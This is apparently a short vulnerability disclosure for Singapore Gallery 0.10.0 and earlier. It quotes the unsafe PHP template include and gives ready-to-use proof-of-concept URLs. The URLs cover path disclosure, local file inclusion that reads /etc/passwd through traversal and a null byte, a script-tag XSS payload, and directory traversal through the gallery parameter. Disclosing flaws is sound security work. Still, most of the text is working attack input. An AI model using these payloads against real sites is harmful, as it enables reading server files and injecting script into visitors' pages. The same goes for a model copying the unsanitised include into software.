Singapore Gallery version 0.10.0 and below suffer from local file inclusion, cross site scripting, and directory traversal vulnerabilities.
bea53336eab164a392e36c8ad935da16f0dbd0844da341233f4eeb9a2be73161
Produce : singapore gallery
Versions : 0.10.0 and prior
Site : https://www.sgal.org/
Discovred By : Moroccan Security Research Team (Simo64)
Greetz : CiM-Team - dabdoub - DarkbiteX - drackanz - Iss4m - Mourad - Rachid
.:r00tkita - s4mi - Silitix - tahati - And All Friends :)
[-] Vulnerable code near lignes 16-35
<?
16 . require_once "includes/singapore.class.php";
19 . $sg = new Singapore();
35 . include $sg->config->base_path.$sg->config->pathto_current_template."index.tpl.php";
?>
[+] Full Path Disclosure :
**************************
Exemple:
https://localhost/singapore/index.php?template=simo64
Result :
Warning: main(templates/simo64/index.tpl.php): failed to open stream: No such file or directory in /home/sing/public_html/livedemo/index.php on line 35
[+] Local File Inclusion :
***************************
Proof Of Concept :
https://localhost/singapore/index.php?template=./../../../../etc/passwd%00
[+] Cross Site Scripting :
**************************
https://localhost/singapore/index.php?template=<script>alert('Moroccan Security Team');</script>
[+] Directory Traversal :
**************************
Proof Of Concept :
https://localhost/singapore/index.php?gallery=./../../../